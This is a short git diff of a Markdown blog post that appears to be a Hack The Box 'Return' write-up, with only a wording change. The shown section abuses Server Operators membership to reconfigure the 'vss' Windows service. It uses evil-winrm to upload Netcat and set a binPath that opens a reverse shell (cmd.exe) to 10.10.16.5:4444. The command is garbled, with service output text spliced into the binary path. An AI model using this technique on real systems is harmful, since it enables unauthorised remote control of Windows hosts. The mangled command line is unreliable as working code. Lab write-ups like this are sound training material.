BinaryExecutioner/BinaryExecutioner.github.io/_posts/2024-12-06-HTB_Return.md

 ### Method - 2

 Since the user belongs to the "Server Operators" group, which has the ability to start and stop system services,  leveraged this privilege to gain a reverse shell.
-Using evil-winrm, we uploaded Netcat to the "Return" machine and modified the service configuration to execute a reverse shell command:
+Using evil-winrm, uploaded Netcat to the "Return" machine and modified the service configuration to execute a reverse shell command:

 ```bash
 *Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config vss binPath="C:[SC] ChangeServiceConfig SUCCESS4.exe -e cmd.exe 10.10.16.5 4444"